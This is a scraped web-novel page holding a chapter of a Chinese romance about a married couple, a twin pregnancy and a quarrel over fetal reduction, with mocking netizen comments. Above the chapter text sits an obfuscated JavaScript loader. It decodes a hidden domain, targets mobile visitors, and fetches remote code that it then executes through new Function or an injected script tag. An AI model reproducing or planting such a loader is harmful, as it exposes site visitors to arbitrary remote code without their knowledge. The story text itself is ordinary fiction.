98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(10(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟立马说:没事,我不是别人呀,老婆,我保证,打不还手骂不还口。只要你高兴,一天揍我一顿,也没问题。我打起来很舒服的。

若若轻轻瞪她一眼,我又不是虐待狂。顿了顿,若有所思的表情,轻轻叹气,而且肚子变大了,会很奇怪的吧,据说手脚也会浮肿,脸上会长斑

孟璟赶忙说:老婆怎么样都美的,我都中意得不得了。

若若还是面露担忧,可我不愿意你看着我身材一天天变得臃肿反正,你就去试试嘛。

以前总觉得没有大段的时间长相厮守,现在借着孩子的东风,总算可以日以继夜地待在一起了,老婆又将她向外推,孟璟心里好生不快,却不能多说什么。

虽然这一天孟璟并没有答应,后来有一件事却改变了孟璟的想法。那是端阳节,若若头晚上没睡好,眼睛肿着,脸也有轻微的水肿,从清早开始把自己关在客房不肯见她。饭也不吃。任凭孟璟使尽浑身解数都无济于事。一直等到晚上,恢复了清隽的面容,才出来活动。

孟璟很纳闷,咨询心理医生,老婆到底几个意思,我最不堪的一面都敢摊开给她看,因为我知道她不会为着那些个就不爱我,她为什么对我这么没信心呢,难道我就是那么肤浅的人?她胖了一点我就变心?还说要白头偕老呢,老了怎么办。

医生却说,若若身处娱乐圈,数十年如一日,自我管理异常苛刻,对于外形的在意也是超乎常人的,怀孕的时候内分泌与之前大相径庭,再加上她们多年来的相处模式都是物理距离上分分合合,陡然之间要变成长时间的朝夕相处,又处在这种她内心变化微妙的时期,行为上有一些不同往常,恰恰是正常的。她建议孟璟最好不要表现得过于在乎。

更何况另一方面,无数个连墨前仆后继地来找,好几次甚至在公司楼下守株待兔。孟璟被她缠得实在没了办法,又不能真的报警,答应把剧本带回去看看。

诡异的是,不看则已,一看,她瞬间深深着迷。

那天晚饭桌上,她宣布自己决定去试镜时,若若脸上明显流露出松口气的神情。孟璟心里又是难过,又是怜惜,又是懊悔。决定要怀孕的时候,若若那样勇敢。现在又像个患得患失的小女孩子,这么紧张。一切都怪自己一时贪心,提出想要孩子。所幸拍摄地点多数都离家不远,而且说定了,但凡若若需要,她就从剧组走人。

事情敲定,定妆照出来之后,引发了新一轮排山倒海的争议。孟璟起先的影迷当然是额手称庆,活得久是有好处的,大惊喜,有生之年之类的说法层出不穷,称赞她颜值一如十年前的也大有人在。与此同时,另一些热心网友则纷纷表示,孟璟这是年度迷惑行为大赏之最,一片群嘲。更有诸多阴谋论,将宋若置于上当受害的地位,孟璟则是心机深沉的腹黑女。

[果冻布丁]:淑芬很迷惑,不说是宋若的囊中之物吗,怎么劳资一觉醒来,主演成了孟璟了

[狮子座的猫]:这个人不是早退圈了吗,现在都快要过吃青春饭的年纪了,反而又出来圈钱啦?她公司倒闭了?

[近战法师0309]:早年不是说不爱演戏来着= = 她那些粉丝还说她性格单纯,待娱乐圈待出抑郁症,既然复杂,怎么又回来了呢,真是好大一朵白莲花鸭。

[你的小榛果]:白莲花鸭是什么菜 听起来好好吃!

[日光族]:缺钱了吧?还是孟璟被挟持了?

[春江潮水连海平]:谁没事挟持她,自己要求的吧,若若一年单单代言这一项收入就吓死人,她家还缺钱?孟不愿意演,还有人能绑着她?牛不吃水强按头?还不是名利心炽烈,心思又活络了!

[好汉三个半]:正常情况下确实不缺钱,合理怀疑她们俩谁有赌瘾,宋若没时间赌,大概是孟璟

[水中的维纳斯]:你们怎么焦点都在孟璟身上,最骚的难道不是让若若怀孕,这么如日中天的时候,生什么孩子!!孟璟为什么不生??大家还记不记得大明湖畔那个骗女朋友代孕的渣T?

[来陪宝宝玩吧]:细思恐极

[阿拉斯加大螃蟹]:某些人真金贵啊,年轻的时候太单纯不适合演戏,理直气壮吃软饭,到了要孩子的阶段她又能演了呢:)

[大软糖]:卧槽这届网友好可怕,人家妻妻恩爱,怎么分工不都人家自己的事,你们戏也太多了吧,作业写完了吗,加工资了吗,脱发治好了吗

[DNA]回复@大软糖:就算分工是若若怀孕,她怎么不在家陪老婆,跑出来演什么戏

舆论往一个个匪夷所思的方向分岔。

书粉都烧香拜佛,求原著不要被这么个半路出家又还俗然后二进宫的女的毁掉。

Cp粉都在等大团圆结局。

宋若唯粉则一再哭喊,这婚从一开始咱就不该结,就该独自美丽。

黑粉在等俩人各自game over。

更多的群众安心吃瓜,等她们俩的孩子降生。孟璟刷到评论,往往会被气笑,若若的微博,她早就给卸载了,吩咐助理注意不要让她看。她知道药瓶子外柔内刚,内心强大,可负能量这种东西,还是越少接触越好。如今,原本的助理们都轮流陪若若住在家里。每次做检查则还是她陪着来。

老婆躺着,衣服捋上去,尚且平坦的小腹露在空气里。

孟璟握住她的手。

当医生转头,唇角露出浅浅的梨涡,柔声说有两个胎心喔!时,两个人不约而同,都愣了一下。

第116章 番外6

结果这一天做完检查回家的路上,若若流了非常多的眼泪,简直像一条小河,将孟璟整个儿的从肉身到灵魂淹了个透。她不停地道歉,却起了与本意完全相反的效果。最后她不得不停在路边,抱着哭成个泪人儿的太太,一再说我错了我错了。直到城市的灯和天边的月都明朗起来,车子才再度发动。

这一切的起因是孟璟说了句要做减胎手术。

医生在介绍方案时就说过,如果出现多胎妊娠,可以考虑减胎手术。

这次看完检查报告,医生再次问,要是下一次检查,两姐妹之间和平共处,没有出现一个吞并另一个的情况,也就是真的怀上了双胞胎,是否考虑手术?

孟璟脱口说要。若若身子骨单弱,单胎已经够吃苦了。而在小朋友和太太之间做选择,她甚至都不用经过大脑,就知道要怎么选。

若若在医生办公室没说什么,发车没多久,孟璟却发现她在哭,哽咽着,没声响,眼眶涨得微微肿起,眼泪像水晶帘子断了线,大珠小珠落玉盘,看得她触目惊心。

孕期的她变得非常敏感。情绪一上来,冷静和理智都悉数隐退,孩子气和任性的一面成为主打。真真和以往判若两人。

正常情况下,若若会分析利弊。现在的她只看感情。那个信誓旦旦说自己不适合和孩子在一起的人,对于还没见面的小东西,就已经有这样深厚的爱意了。

这次孟璟离开家的时候,若若甚至都没有和她说话。

孟璟也并不气馁,每天让小助理拿视频过去给老婆唱催眠曲,若若躺在那里,非常乖非常安静,被子下边的身体曲线依然流畅,看不出任何突兀的地方。她的大眼睛眨巴眨巴,悄悄地听着,像容易受惊吓的小鹿子。孟璟唱完,问她怎么样,好不好听,好听的话老婆亲我一下。若若并不回答,也不飞吻,翻个身背对,表示自己睡着了。

这种半冷战的状态持续了大半个月。有天深夜,孟璟已经睡了,手机铃声大作,是若若的视频。时间是凌晨三点过五分,她两点拍完最后一场戏。心里想着这是亲老婆,所以会挑时间,嘴里咕哝着接起,揉着乱糟糟的头发,床头本来留着一盏小灯,若若那边也是。

浅橙色的灯光里,微微闪着光泽的脸庞像是皎洁的月。

孟璟眼睛发涩,轻笑着问:想我啦?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间